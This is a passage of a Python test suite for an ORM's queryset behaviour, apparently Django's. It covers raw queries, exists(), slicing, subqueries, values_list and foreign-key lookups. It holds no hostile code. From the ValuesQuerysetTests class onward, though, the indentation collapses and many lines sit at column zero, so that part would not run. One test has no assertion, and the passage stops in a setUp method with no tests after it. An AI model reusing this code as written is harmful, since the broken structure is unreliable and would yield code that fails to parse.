        self.assertEqual(repr(qs), "<RawQuerySet: SELECT * FROM queries_note WHERE note = n1>")
        query = "SELECT * FROM queries_note WHERE note = %s and misc = %s"
        params = ['n1', 'foo']
        qs = Note.objects.raw(query, params=params)
        self.assertEqual(repr(qs), "<RawQuerySet: SELECT * FROM queries_note WHERE note = n1 and misc = foo>")
class GeneratorExpressionTests(SimpleTestCase):
    """__in lookups with generator/iterator right-hand sides (#10432)."""
    def test_ticket10432(self):
        # Using an empty iterator as the rvalue for an "__in"
        # lookup is legal.
        self.assertCountEqual(Note.objects.filter(pk__in=iter(())), [])
class ComparisonTests(TestCase):
    """Case-insensitive lookups with SQL wildcard characters in values (#8597)."""
    @classmethod
    def setUpTestData(cls):
        cls.n1 = Note.objects.create(note='n1', misc='foo', id=1)
        e1 = ExtraInfo.objects.create(info='e1', note=cls.n1)
        cls.a2 = Author.objects.create(name='a2', num=2002, extra=e1)
    def test_ticket8597(self):
        """iexact/istartswith/iendswith must escape '_' and '%' in values."""
        # Regression tests for case-insensitive comparisons
        item_ab = Item.objects.create(name="a_b", created=datetime.datetime.now(), creator=self.a2, note=self.n1)
        item_xy = Item.objects.create(name="x%y", created=datetime.datetime.now(), creator=self.a2, note=self.n1)
        self.assertSequenceEqual(
            Item.objects.filter(name__iexact="A_b"),
            [item_ab],
        )
        self.assertSequenceEqual(
            Item.objects.filter(name__iexact="x%Y"),
            [item_xy],
        )
        self.assertSequenceEqual(
            Item.objects.filter(name__istartswith="A_b"),
            [item_ab],
        )
        self.assertSequenceEqual(
            Item.objects.filter(name__iendswith="A_b"),
            [item_ab],
        )
class ExistsSql(TestCase):
    """SQL generated by QuerySet.exists(), with and without distinct()."""
    def test_exists(self):
        """exists() must not select any real model columns."""
        with CaptureQueriesContext(connection) as captured_queries:
            self.assertFalse(Tag.objects.exists())
        # Ok - so the exist query worked - but did it include too many columns?
        self.assertEqual(len(captured_queries), 1)
        qstr = captured_queries[0]['sql']
        # Renamed from `id`/`name` to avoid shadowing the id() builtin.
        quoted_id = connection.ops.quote_name('id')
        quoted_name = connection.ops.quote_name('name')
        self.assertNotIn(quoted_id, qstr)
        self.assertNotIn(quoted_name, qstr)
    def test_ticket_18414(self):
        """exists() works on distinct and sliced querysets (#18414)."""
        Article.objects.create(name='one', created=datetime.datetime.now())
        Article.objects.create(name='one', created=datetime.datetime.now())
        Article.objects.create(name='two', created=datetime.datetime.now())
        self.assertTrue(Article.objects.exists())
        self.assertTrue(Article.objects.distinct().exists())
        self.assertTrue(Article.objects.distinct()[1:3].exists())
        # An empty slice can never contain rows.
        self.assertFalse(Article.objects.distinct()[1:1].exists())
    @skipUnlessDBFeature('can_distinct_on_fields')
    def test_ticket_18414_distinct_on(self):
        """exists() works with DISTINCT ON plus slicing (#18414)."""
        Article.objects.create(name='one', created=datetime.datetime.now())
        Article.objects.create(name='one', created=datetime.datetime.now())
        Article.objects.create(name='two', created=datetime.datetime.now())
        self.assertTrue(Article.objects.distinct('name').exists())
        self.assertTrue(Article.objects.distinct('name')[1:2].exists())
        # Only two distinct names exist, so the [2:3] slice is empty.
        self.assertFalse(Article.objects.distinct('name')[2:3].exists())
class QuerysetOrderedTests(unittest.TestCase):
    """
    Tests for the Queryset.ordered attribute.
    """
    def test_no_default_or_explicit_ordering(self):
        # No Meta.ordering and no order_by() -> not ordered.
        self.assertIs(Annotation.objects.all().ordered, False)
    def test_cleared_default_ordering(self):
        # Tag has a default ordering; an empty order_by() clears it.
        self.assertIs(Tag.objects.all().ordered, True)
        self.assertIs(Tag.objects.all().order_by().ordered, False)
    def test_explicit_ordering(self):
        self.assertIs(Annotation.objects.all().order_by('id').ordered, True)
    def test_empty_queryset(self):
        # none() is trivially ordered (there is nothing to order).
        self.assertIs(Annotation.objects.none().ordered, True)
    def test_order_by_extra(self):
        self.assertIs(Annotation.objects.all().extra(order_by=['id']).ordered, True)
    def test_annotated_ordering(self):
        qs = Annotation.objects.annotate(num_notes=Count('notes'))
        self.assertIs(qs.ordered, False)
        self.assertIs(qs.order_by('num_notes').ordered, True)
    def test_annotated_default_ordering(self):
        # Annotating drops the model's default ordering.
        qs = Tag.objects.annotate(num_notes=Count('pk'))
        self.assertIs(qs.ordered, False)
        self.assertIs(qs.order_by('name').ordered, True)
    def test_annotated_values_default_ordering(self):
        qs = Tag.objects.values('name').annotate(num_notes=Count('pk'))
        self.assertIs(qs.ordered, False)
        self.assertIs(qs.order_by('name').ordered, True)
@skipUnlessDBFeature('allow_sliced_subqueries_with_in')
class SubqueryTests(TestCase):
    """Sliced/ordered subqueries used in __in lookups and deletes."""
    @classmethod
    def setUpTestData(cls):
        NamedCategory.objects.create(id=1, name='first')
        NamedCategory.objects.create(id=2, name='second')
        NamedCategory.objects.create(id=3, name='third')
        NamedCategory.objects.create(id=4, name='fourth')
    def test_ordered_subselect(self):
        "Subselects honor any manual ordering"
        query = DumbCategory.objects.filter(id__in=DumbCategory.objects.order_by('-id')[0:2])
        self.assertEqual(set(query.values_list('id', flat=True)), {3, 4})
        query = DumbCategory.objects.filter(id__in=DumbCategory.objects.order_by('-id')[:2])
        self.assertEqual(set(query.values_list('id', flat=True)), {3, 4})
        query = DumbCategory.objects.filter(id__in=DumbCategory.objects.order_by('-id')[1:2])
        self.assertEqual(set(query.values_list('id', flat=True)), {3})
        query = DumbCategory.objects.filter(id__in=DumbCategory.objects.order_by('-id')[2:])
        self.assertEqual(set(query.values_list('id', flat=True)), {1, 2})
    def test_slice_subquery_and_query(self):
        """
        Slice a query that has a sliced subquery
        """
        query = DumbCategory.objects.filter(id__in=DumbCategory.objects.order_by('-id')[0:2])[0:2]
        self.assertEqual({x.id for x in query}, {3, 4})
        query = DumbCategory.objects.filter(id__in=DumbCategory.objects.order_by('-id')[1:3])[1:3]
        self.assertEqual({x.id for x in query}, {3})
        query = DumbCategory.objects.filter(id__in=DumbCategory.objects.order_by('-id')[2:])[1:]
        self.assertEqual({x.id for x in query}, {2})
    def test_related_sliced_subquery(self):
        """
        Related objects constraints can safely contain sliced subqueries.
        refs #22434
        """
        generic = NamedCategory.objects.create(id=5, name="Generic")
        t1 = Tag.objects.create(name='t1', category=generic)
        t2 = Tag.objects.create(name='t2', category=generic)
        ManagedModel.objects.create(data='mm1', tag=t1, public=True)
        mm2 = ManagedModel.objects.create(data='mm2', tag=t2, public=True)
        query = ManagedModel.normal_manager.filter(
            tag__in=Tag.objects.order_by('-id')[:1]
        )
        self.assertEqual({x.id for x in query}, {mm2.id})
    def test_sliced_delete(self):
        "Delete queries can safely contain sliced subqueries"
        DumbCategory.objects.filter(id__in=DumbCategory.objects.order_by('-id')[0:1]).delete()
        self.assertEqual(set(DumbCategory.objects.values_list('id', flat=True)), {1, 2, 3})
        DumbCategory.objects.filter(id__in=DumbCategory.objects.order_by('-id')[1:2]).delete()
        self.assertEqual(set(DumbCategory.objects.values_list('id', flat=True)), {1, 3})
        DumbCategory.objects.filter(id__in=DumbCategory.objects.order_by('-id')[1:]).delete()
        self.assertEqual(set(DumbCategory.objects.values_list('id', flat=True)), {3})
    def test_distinct_ordered_sliced_subquery(self):
        """distinct()+order_by()+slice subqueries resolve to the pk column."""
        # Implicit values('id').
        self.assertSequenceEqual(
            NamedCategory.objects.filter(
                id__in=NamedCategory.objects.distinct().order_by('name')[0:2],
            ).order_by('name').values_list('name', flat=True), ['first', 'fourth']
        )
        # Explicit values('id').
        self.assertSequenceEqual(
            NamedCategory.objects.filter(
                id__in=NamedCategory.objects.distinct().order_by('-name').values('id')[0:2],
            ).order_by('name').values_list('name', flat=True), ['second', 'third']
        )
        # Annotated value.
        self.assertSequenceEqual(
            DumbCategory.objects.filter(
                id__in=DumbCategory.objects.annotate(
                    double_id=F('id') * 2
                ).order_by('id').distinct().values('double_id')[0:2],
            ).order_by('id').values_list('id', flat=True), [2, 4]
        )
class QuerySetBitwiseOperationTests(TestCase):
    """Combining querysets with | and & when one or both sides are sliced."""
    @classmethod
    def setUpTestData(cls):
        cls.school = School.objects.create()
        cls.room_1 = Classroom.objects.create(school=cls.school, has_blackboard=False, name='Room 1')
        cls.room_2 = Classroom.objects.create(school=cls.school, has_blackboard=True, name='Room 2')
        cls.room_3 = Classroom.objects.create(school=cls.school, has_blackboard=True, name='Room 3')
        cls.room_4 = Classroom.objects.create(school=cls.school, has_blackboard=False, name='Room 4')
    @skipUnlessDBFeature('allow_sliced_subqueries_with_in')
    def test_or_with_rhs_slice(self):
        """qs | sliced_qs includes the sliced side's rows."""
        qs1 = Classroom.objects.filter(has_blackboard=True)
        qs2 = Classroom.objects.filter(has_blackboard=False)[:1]
        self.assertCountEqual(qs1 | qs2, [self.room_1, self.room_2, self.room_3])
    @skipUnlessDBFeature('allow_sliced_subqueries_with_in')
    def test_or_with_lhs_slice(self):
        """sliced_qs | qs includes the sliced side's rows."""
        qs1 = Classroom.objects.filter(has_blackboard=True)[:1]
        qs2 = Classroom.objects.filter(has_blackboard=False)
        self.assertCountEqual(qs1 | qs2, [self.room_1, self.room_2, self.room_4])
    @skipUnlessDBFeature('allow_sliced_subqueries_with_in')
    def test_or_with_both_slice(self):
        """OR of two sliced querysets yields one row from each side."""
        qs1 = Classroom.objects.filter(has_blackboard=False)[:1]
        qs2 = Classroom.objects.filter(has_blackboard=True)[:1]
        self.assertCountEqual(qs1 | qs2, [self.room_1, self.room_2])
    @skipUnlessDBFeature('allow_sliced_subqueries_with_in')
    def test_or_with_both_slice_and_ordering(self):
        """OR of two sliced+ordered querysets honors each side's ordering."""
        qs1 = Classroom.objects.filter(has_blackboard=False).order_by('-pk')[:1]
        qs2 = Classroom.objects.filter(has_blackboard=True).order_by('-name')[:1]
        self.assertCountEqual(qs1 | qs2, [self.room_3, self.room_4])
    def test_subquery_aliases(self):
        """AND-combining with an Exists() subquery keeps aliases valid, even nested."""
        combined = School.objects.filter(pk__isnull=False) & School.objects.filter(
            Exists(Classroom.objects.filter(
                has_blackboard=True,
                school=OuterRef('pk'),
            )),
        )
        self.assertSequenceEqual(combined, [self.school])
        nested_combined = School.objects.filter(pk__in=combined.values('pk'))
        self.assertSequenceEqual(nested_combined, [self.school])
class CloneTests(TestCase):
    """Queryset cloning must not deepcopy models, options, or cached results."""
    def test_evaluated_queryset_as_argument(self):
        "#13227 -- If a queryset is already evaluated, it can still be used as a query arg"
        n = Note(note='Test1', misc='misc')
        n.save()
        e = ExtraInfo(info='good', note=n)
        e.save()
        n_list = Note.objects.all()
        # Evaluate the Note queryset, populating the query cache
        list(n_list)
        # Make one of cached results unpicklable (a Lock cannot be pickled).
        n_list._result_cache[0].lock = Lock()
        with self.assertRaises(TypeError):
            pickle.dumps(n_list)
        # Use the note queryset in a query, and evaluate
        # that query in a way that involves cloning.
        self.assertEqual(ExtraInfo.objects.filter(note__in=n_list)[0].info, 'good')
    def test_no_model_options_cloning(self):
        """
        Cloning a queryset does not get out of hand. While complete
        testing is impossible, this is a sanity check against invalid use of
        deepcopy. refs #16759.
        """
        opts_class = type(Note._meta)
        note_deepcopy = getattr(opts_class, "__deepcopy__", None)
        # Fail loudly if queryset cloning ever deep-copies Model._meta.
        opts_class.__deepcopy__ = lambda obj, memo: self.fail("Model options shouldn't be cloned.")
        try:
            Note.objects.filter(pk__lte=F('pk') + 1).all()
        finally:
            # Restore (or remove) the patched hook so other tests are unaffected.
            if note_deepcopy is None:
                delattr(opts_class, "__deepcopy__")
            else:
                opts_class.__deepcopy__ = note_deepcopy
    def test_no_fields_cloning(self):
        """
        Cloning a queryset does not get out of hand. While complete
        testing is impossible, this is a sanity check against invalid use of
        deepcopy. refs #16759.
        """
        opts_class = type(Note._meta.get_field("misc"))
        note_deepcopy = getattr(opts_class, "__deepcopy__", None)
        # Fail loudly if queryset cloning ever deep-copies a model field.
        opts_class.__deepcopy__ = lambda obj, memo: self.fail("Model fields shouldn't be cloned")
        try:
            Note.objects.filter(note=F('misc')).all()
        finally:
            # Restore (or remove) the patched hook so other tests are unaffected.
            if note_deepcopy is None:
                delattr(opts_class, "__deepcopy__")
            else:
                opts_class.__deepcopy__ = note_deepcopy
class EmptyQuerySetTests(SimpleTestCase):
    """values()/values_list() on empty querysets (#14366, #19151)."""
    def test_emptyqueryset_values(self):
        # #14366 -- Calling .values() on an empty QuerySet and then cloning
        # that should not cause an error
        self.assertCountEqual(Number.objects.none().values('num').order_by('num'), [])
    def test_values_subquery(self):
        # An empty values()/values_list() subquery yields no matches.
        self.assertCountEqual(Number.objects.filter(pk__in=Number.objects.none().values('pk')), [])
        self.assertCountEqual(Number.objects.filter(pk__in=Number.objects.none().values_list('pk')), [])
    def test_ticket_19151(self):
        # #19151 -- Calling .values() or .values_list() on an empty QuerySet
        # should return an empty QuerySet and not cause an error.
        q = Author.objects.none()
        self.assertCountEqual(q.values(), [])
        self.assertCountEqual(q.values_list(), [])
class ValuesQuerysetTests(TestCase):
@classmethod
def setUpTestData(cls):
    # Single fixture row: every test below expects num == 72.
    Number.objects.create(num=72)
def test_flat_values_list(self):
    """values_list(flat=True) may be applied over a prior values_list()."""
    qs = Number.objects.values_list("num")
    qs = qs.values_list("num", flat=True)
    self.assertSequenceEqual(qs, [72])
def test_extra_values(self):
    """extra() select columns plus ordering survive a values() call (#14930)."""
    # testing for ticket 14930 issues
    qs = Number.objects.extra(select={'value_plus_x': 'num+%s', 'value_minus_x': 'num-%s'}, select_params=(1, 2))
    qs = qs.order_by('value_minus_x')
    qs = qs.values('num')
    self.assertSequenceEqual(qs, [{'num': 72}])
def test_extra_values_order_twice(self):
    """Reordering by a second extra() column then values() works (#14930)."""
    # testing for ticket 14930 issues
    qs = Number.objects.extra(select={'value_plus_one': 'num+1', 'value_minus_one': 'num-1'})
    qs = qs.order_by('value_minus_one').order_by('value_plus_one')
    qs = qs.values('num')
    self.assertSequenceEqual(qs, [{'num': 72}])
def test_extra_values_order_multiple(self):
    """Ordering by several extra() columns, including a constant, works."""
    # Postgres doesn't allow constants in order by, so check for that.
    qs = Number.objects.extra(select={
        'value_plus_one': 'num+1',
        'value_minus_one': 'num-1',
        'constant_value': '1'
    })
    qs = qs.order_by('value_plus_one', 'value_minus_one', 'constant_value')
    qs = qs.values('num')
    self.assertSequenceEqual(qs, [{'num': 72}])
def test_extra_values_order_in_extra(self):
# testing for ticket 14930 issues
qs = Number.objects.extra(
select={'value_plus_one': 'num+1', 'value_minus_one': 'num-1'},
order_by=['value_minus_one'],
)
qs = qs.values('num')
def test_extra_select_params_values_order_in_extra(self):
# testing for 23259 issue
qs = Number.objects.extra(
select={'value_plus_x': 'num+%s'},
select_params=[1],
order_by=['value_plus_x'],
)
qs = qs.filter(num=72)
qs = qs.values('num')
self.assertSequenceEqual(qs, [{'num': 72}])
def test_extra_multiple_select_params_values_order_by(self):
# testing for 23259 issue
qs = Number.objects.extra(select={'value_plus_x': 'num+%s', 'value_minus_x': 'num-%s'}, select_params=(72, 72))
qs = qs.order_by('value_minus_x')
qs = qs.filter(num=1)
qs = qs.values('num')
self.assertSequenceEqual(qs, [])
def test_extra_values_list(self):
# testing for ticket 14930 issues
qs = Number.objects.extra(select={'value_plus_one': 'num+1'})
qs = qs.order_by('value_plus_one')
qs = qs.values_list('num')
self.assertSequenceEqual(qs, [(72,)])
def test_flat_extra_values_list(self):
# testing for ticket 14930 issues
qs = Number.objects.extra(select={'value_plus_one': 'num+1'})
qs = qs.order_by('value_plus_one')
qs = qs.values_list('num', flat=True)
self.assertSequenceEqual(qs, [72])
def test_field_error_values_list(self):
# see #23443
msg = "Cannot resolve keyword %r into field. Join on 'name' not permitted." % 'foo'
with self.assertRaisesMessage(FieldError, msg):
Tag.objects.values_list('name__foo')
def test_named_values_list_flat(self):
msg = "'flat' and 'named' can't be used together."
with self.assertRaisesMessage(TypeError, msg):
Number.objects.values_list('num', flat=True, named=True)
def test_named_values_list_bad_field_name(self):
msg = "Type names and field names must be valid identifiers: '1'"
with self.assertRaisesMessage(ValueError, msg):
Number.objects.extra(select={'1': 'num+1'}).values_list('1', named=True).first()
def test_named_values_list_with_fields(self):
qs = Number.objects.extra(select={'num2': 'num+1'}).annotate(Count('id'))
values = qs.values_list('num', 'num2', named=True).first()
self.assertEqual(type(values).__name__, 'Row')
self.assertEqual(values._fields, ('num', 'num2'))
self.assertEqual(values.num, 72)
self.assertEqual(values.num2, 73)
def test_named_values_list_without_fields(self):
qs = Number.objects.extra(select={'num2': 'num+1'}).annotate(Count('id'))
values = qs.values_list(named=True).first()
self.assertEqual(type(values).__name__, 'Row')
self.assertEqual(
values._fields,
('num2', 'id', 'num', 'other_num', 'another_num', 'id__count'),
)
self.assertEqual(values.num, 72)
self.assertEqual(values.num2, 73)
self.assertEqual(values.id__count, 1)
def test_named_values_list_expression_with_default_alias(self):
expr = Count('id')
values = Number.objects.annotate(id__count1=expr).values_list(expr, 'id__count1', named=True).first()
self.assertEqual(values._fields, ('id__count2', 'id__count1'))
def test_named_values_list_expression(self):
expr = F('num') + 1
qs = Number.objects.annotate(combinedexpression1=expr).values_list(expr, 'combinedexpression1', named=True)
values = qs.first()
self.assertEqual(values._fields, ('combinedexpression2', 'combinedexpression1'))
def test_named_values_pickle(self):
value = Number.objects.values_list('num', 'other_num', named=True).get()
self.assertEqual(value, (72, None))
self.assertEqual(pickle.loads(pickle.dumps(value)), value)
class QuerySetSupportsPythonIdioms(TestCase):
    """QuerySets support indexing, slicing, len(), and &/| combination."""
    @classmethod
    def setUpTestData(cls):
        # Seven articles named 'Article 1' .. 'Article 7', all same timestamp.
        some_date = datetime.datetime(2014, 5, 16, 12, 1)
        cls.articles = [
            Article.objects.create(name=f'Article {i}', created=some_date)
            for i in range(1, 8)
        ]
    def get_ordered_articles(self):
        # Fresh, deterministically-ordered queryset for every call.
        return Article.objects.all().order_by('name')
    def test_can_get_items_using_index_and_slice_notation(self):
        self.assertEqual(self.get_ordered_articles()[0].name, 'Article 1')
        self.assertSequenceEqual(
            self.get_ordered_articles()[1:3],
            [self.articles[1], self.articles[2]],
        )
    def test_slicing_with_steps_can_be_used(self):
        self.assertSequenceEqual(
            self.get_ordered_articles()[::2], [
                self.articles[0],
                self.articles[2],
                self.articles[4],
                self.articles[6],
            ]
        )
    def test_slicing_without_step_is_lazy(self):
        # A plain slice only sets LIMIT/OFFSET; nothing is executed yet.
        with self.assertNumQueries(0):
            self.get_ordered_articles()[0:5]
    def test_slicing_with_tests_is_not_lazy(self):
        # A stepped slice must evaluate immediately (step is applied in Python).
        with self.assertNumQueries(1):
            self.get_ordered_articles()[0:5:3]
    def test_slicing_can_slice_again_after_slicing(self):
        self.assertSequenceEqual(
            self.get_ordered_articles()[0:5][0:2],
            [self.articles[0], self.articles[1]],
        )
        self.assertSequenceEqual(self.get_ordered_articles()[0:5][4:], [self.articles[4]])
        self.assertSequenceEqual(self.get_ordered_articles()[0:5][5:], [])
        # Some more tests!
        self.assertSequenceEqual(
            self.get_ordered_articles()[2:][0:2],
            [self.articles[2], self.articles[3]],
        )
        self.assertSequenceEqual(
            self.get_ordered_articles()[2:][:2],
            [self.articles[2], self.articles[3]],
        )
        self.assertSequenceEqual(self.get_ordered_articles()[2:][2:3], [self.articles[4]])
        # Using an offset without a limit is also possible.
        self.assertSequenceEqual(
            self.get_ordered_articles()[5:],
            [self.articles[5], self.articles[6]],
        )
    def test_slicing_cannot_filter_queryset_once_sliced(self):
        msg = 'Cannot filter a query once a slice has been taken.'
        with self.assertRaisesMessage(TypeError, msg):
            Article.objects.all()[0:5].filter(id=1)
    def test_slicing_cannot_reorder_queryset_once_sliced(self):
        msg = 'Cannot reorder a query once a slice has been taken.'
        with self.assertRaisesMessage(TypeError, msg):
            Article.objects.all()[0:5].order_by('id')
    def test_slicing_cannot_combine_queries_once_sliced(self):
        msg = 'Cannot combine queries once a slice has been taken.'
        with self.assertRaisesMessage(TypeError, msg):
            Article.objects.all()[0:1] & Article.objects.all()[4:5]
    def test_slicing_negative_indexing_not_supported_for_single_element(self):
        """hint: inverting your ordering might do what you need"""
        msg = 'Negative indexing is not supported.'
        with self.assertRaisesMessage(ValueError, msg):
            Article.objects.all()[-1]
    def test_slicing_negative_indexing_not_supported_for_range(self):
        """hint: inverting your ordering might do what you need"""
        msg = 'Negative indexing is not supported.'
        with self.assertRaisesMessage(ValueError, msg):
            Article.objects.all()[0:-5]
        with self.assertRaisesMessage(ValueError, msg):
            Article.objects.all()[-1:]
    def test_invalid_index(self):
        msg = 'QuerySet indices must be integers or slices, not str.'
        with self.assertRaisesMessage(TypeError, msg):
            Article.objects.all()['foo']
    def test_can_get_number_of_items_in_queryset_using_standard_len(self):
        self.assertEqual(len(Article.objects.filter(name__exact='Article 1')), 1)
    def test_can_combine_queries_using_and_and_or_operators(self):
        s1 = Article.objects.filter(name__exact='Article 1')
        s2 = Article.objects.filter(name__exact='Article 2')
        self.assertSequenceEqual(
            (s1 | s2).order_by('name'),
            [self.articles[0], self.articles[1]],
        )
        self.assertSequenceEqual(s1 & s2, [])
class WeirdQuerysetSlicingTests(TestCase):
    """Edge-case slices (empty ranges, zero limits) short-circuit to no SQL."""
    @classmethod
    def setUpTestData(cls):
        Number.objects.create(num=1)
        Number.objects.create(num=2)
        Article.objects.create(name='one', created=datetime.datetime.now())
        Article.objects.create(name='two', created=datetime.datetime.now())
        Article.objects.create(name='three', created=datetime.datetime.now())
        Article.objects.create(name='four', created=datetime.datetime.now())
        food = Food.objects.create(name='spam')
        Eaten.objects.create(meal='spam with eggs', food=food)
    def test_tickets_7698_10202(self):
        # People like to slice with '0' as the high-water mark.
        self.assertQuerysetEqual(Article.objects.all()[0:0], [])
        self.assertQuerysetEqual(Article.objects.all()[0:0][:10], [])
        self.assertEqual(Article.objects.all()[:0].count(), 0)
        msg = 'Cannot change a query once a slice has been taken.'
        with self.assertRaisesMessage(TypeError, msg):
            Article.objects.all()[:0].latest('created')
    def test_empty_resultset_sql(self):
        # ticket #12192 -- a provably-empty slice executes no SQL at all.
        self.assertNumQueries(0, lambda: list(Number.objects.all()[1:1]))
    def test_empty_sliced_subquery(self):
        self.assertEqual(Eaten.objects.filter(food__in=Food.objects.all()[0:0]).count(), 0)
    def test_empty_sliced_subquery_exclude(self):
        # Excluding membership in an empty subquery keeps every row.
        self.assertEqual(Eaten.objects.exclude(food__in=Food.objects.all()[0:0]).count(), 1)
    def test_zero_length_values_slicing(self):
        n = 42
        with self.assertNumQueries(0):
            self.assertQuerysetEqual(Article.objects.values()[n:n], [])
            self.assertQuerysetEqual(Article.objects.values_list()[n:n], [])
class EscapingTests(TestCase):
    """SQL-reserved identifiers used as model/column names are quoted."""
    def test_ticket_7302(self):
        # Reserved names are appropriately escaped
        r_a = ReservedName.objects.create(name='a', order=42)
        r_b = ReservedName.objects.create(name='b', order=37)
        self.assertSequenceEqual(
            ReservedName.objects.all().order_by('order'),
            [r_b, r_a],
        )
        # Ordering by a mix of a reserved column and an extra() alias.
        self.assertSequenceEqual(
            ReservedName.objects.extra(select={'stuff': 'name'}, order_by=('order', 'stuff')),
            [r_b, r_a],
        )
class ToFieldTests(TestCase):
    """
    Lookups across FK relations using model instances and subqueries.
    NOTE(review): the Eaten.food FK presumably uses to_field (hence the class
    name) -- confirm against the models module.
    """
    def test_in_query(self):
        apple = Food.objects.create(name="apple")
        pear = Food.objects.create(name="pear")
        lunch = Eaten.objects.create(food=apple, meal="lunch")
        dinner = Eaten.objects.create(food=pear, meal="dinner")
        # __in accepts model instances directly.
        self.assertEqual(
            set(Eaten.objects.filter(food__in=[apple, pear])),
            {lunch, dinner},
        )
    def test_in_subquery(self):
        apple = Food.objects.create(name="apple")
        lunch = Eaten.objects.create(food=apple, meal="lunch")
        self.assertEqual(
            set(Eaten.objects.filter(food__in=Food.objects.filter(name='apple'))),
            {lunch}
        )
        # Subquery selecting an unrelated value column matches nothing.
        self.assertEqual(
            set(Eaten.objects.filter(food__in=Food.objects.filter(name='apple').values('eaten__meal'))),
            set()
        )
        self.assertEqual(
            set(Food.objects.filter(eaten__in=Eaten.objects.filter(meal='lunch'))),
            {apple}
        )
    def test_nested_in_subquery(self):
        extra = ExtraInfo.objects.create()
        author = Author.objects.create(num=42, extra=extra)
        report = Report.objects.create(creator=author)
        comment = ReportComment.objects.create(report=report)
        # Two levels of __in subqueries resolve correctly.
        comments = ReportComment.objects.filter(
            report__in=Report.objects.filter(
                creator__in=extra.author_set.all(),
            ),
        )
        self.assertSequenceEqual(comments, [comment])
    def test_reverse_in(self):
        # Reverse FK __in with a list of related instances.
        apple = Food.objects.create(name="apple")
        pear = Food.objects.create(name="pear")
        lunch_apple = Eaten.objects.create(food=apple, meal="lunch")
        lunch_pear = Eaten.objects.create(food=pear, meal="dinner")
        self.assertEqual(
            set(Food.objects.filter(eaten__in=[lunch_apple, lunch_pear])),
            {apple, pear}
        )
    def test_single_object(self):
        apple = Food.objects.create(name="apple")
        lunch = Eaten.objects.create(food=apple, meal="lunch")
        dinner = Eaten.objects.create(food=apple, meal="dinner")
        self.assertEqual(
            set(Eaten.objects.filter(food=apple)),
            {lunch, dinner}
        )
    def test_single_object_reverse(self):
        apple = Food.objects.create(name="apple")
        lunch = Eaten.objects.create(food=apple, meal="lunch")
        self.assertEqual(
            set(Food.objects.filter(eaten=lunch)),
            {apple}
        )
    def test_recursive_fk(self):
        # Self-referential FK: filter children by parent instance.
        node1 = Node.objects.create(num=42)
        node2 = Node.objects.create(num=1, parent=node1)
        self.assertEqual(
            list(Node.objects.filter(parent=node1)),
            [node2]
        )
    def test_recursive_fk_reverse(self):
        # Self-referential FK: filter parents by child instance.
        node1 = Node.objects.create(num=42)
        node2 = Node.objects.create(num=1, parent=node1)
        self.assertEqual(
            list(Node.objects.filter(node=node2)),
            [node1]
        )
class IsNullTests(TestCase):
    """__isnull lookups on FK relations, including non-standard target fields."""
    def test_primary_key(self):
        custom = CustomPk.objects.create(name='pk')
        null = Related.objects.create()
        notnull = Related.objects.create(custom=custom)
        self.assertSequenceEqual(Related.objects.filter(custom__isnull=False), [notnull])
        self.assertSequenceEqual(Related.objects.filter(custom__isnull=True), [null])
    def test_to_field(self):
        apple = Food.objects.create(name="apple")
        e1 = Eaten.objects.create(food=apple, meal="lunch")
        e2 = Eaten.objects.create(meal="lunch")  # food left NULL
        self.assertSequenceEqual(
            Eaten.objects.filter(food__isnull=False),
            [e1],
        )
        self.assertSequenceEqual(
            Eaten.objects.filter(food__isnull=True),
            [e2],
        )
class ConditionalTests(TestCase):
    """Tests whose execution depend on different environment conditions like
    Python version or DB backend features"""
    @classmethod
    def setUpTestData(cls):
        # Tag tree: t1 -> (t2, t3); t3 -> (t4, t5). t3..t5 have no category.
        generic = NamedCategory.objects.create(name="Generic")
        t1 = Tag.objects.create(name='t1', category=generic)
        Tag.objects.create(name='t2', parent=t1, category=generic)
        t3 = Tag.objects.create(name='t3', parent=t1)
        Tag.objects.create(name='t4', parent=t3)
        Tag.objects.create(name='t5', parent=t3)
    def test_infinite_loop(self):
        # If you're not careful, it's possible to introduce infinite loops via
        # default ordering on foreign keys in a cycle. We detect that.
        with self.assertRaisesMessage(FieldError, 'Infinite loop caused by ordering.'):
            list(LoopX.objects.all())  # Force queryset evaluation with list()
        with self.assertRaisesMessage(FieldError, 'Infinite loop caused by ordering.'):
            list(LoopZ.objects.all())  # Force queryset evaluation with list()
        # Note that this doesn't cause an infinite loop, since the default
        # ordering on the Tag model is empty (and thus defaults to using "id"
        # for the related field).
        self.assertEqual(len(Tag.objects.order_by('parent')), 5)
        # ... but you can still order in a non-recursive fashion among linked
        # fields (the previous test failed because the default ordering was
        # recursive).
        self.assertQuerysetEqual(
            LoopX.objects.all().order_by('y__x__y__x__id'),
            []
        )
    # When grouping without specifying ordering, we add an explicit "ORDER BY NULL"
    # portion in MySQL to prevent unnecessary sorting.
    @skipUnlessDBFeature('requires_explicit_null_ordering_when_grouping')
    def test_null_ordering_added(self):
        query = Tag.objects.values_list('parent_id', flat=True).order_by().query
        query.group_by = ['parent_id']
        sql = query.get_compiler(DEFAULT_DB_ALIAS).as_sql()[0]
        fragment = "ORDER BY "
        pos = sql.find(fragment)
        # Exactly one ORDER BY clause, immediately followed by NULL.
        self.assertEqual(sql.find(fragment, pos + 1), -1)
        self.assertEqual(sql.find("NULL", pos + len(fragment)), pos + len(fragment))
    def test_in_list_limit(self):
        # The "in" lookup works with lists of 1000 items or more.
        # The numbers amount is picked to force three different IN batches
        # for Oracle, yet to be less than 2100 parameter limit for MSSQL.
        numbers = list(range(2050))
        max_query_params = connection.features.max_query_params
        if max_query_params is None or max_query_params >= len(numbers):
            Number.objects.bulk_create(Number(num=num) for num in numbers)
            for number in [1000, 1001, 2000, len(numbers)]:
                with self.subTest(number=number):
                    self.assertEqual(Number.objects.filter(num__in=numbers[:number]).count(), number)
class UnionTests(unittest.TestCase):
    """
    Tests for the union of two querysets. Bug #12252.

    Verifies that filter(Q1) | filter(Q2) matches filter(Q1 | Q2) for
    various multi-join Q objects, in both operand orders.
    """
    def setUp(self):
        # BUG FIX: this was previously a setUpTestData() classmethod, which is
        # a django.test.TestCase hook -- plain unittest.TestCase never calls
        # it, so no fixture rows were created and every test compared empty
        # sets vacuously. Use unittest's per-test setUp() instead.
        objectas = []
        objectbs = []
        a_info = ['one', 'two', 'three']
        for name in a_info:
            o = ObjectA(name=name)
            o.save()
            objectas.append(o)
        b_info = [('un', 1, objectas[0]), ('deux', 2, objectas[0]), ('trois', 3, objectas[2])]
        for name, number, objecta in b_info:
            o = ObjectB(name=name, num=number, objecta=objecta)
            o.save()
            objectbs.append(o)
        c_info = [('ein', objectas[2], objectbs[2]), ('zwei', objectas[1], objectbs[1])]
        for name, objecta, objectb in c_info:
            ObjectC(name=name, objecta=objecta, objectb=objectb).save()
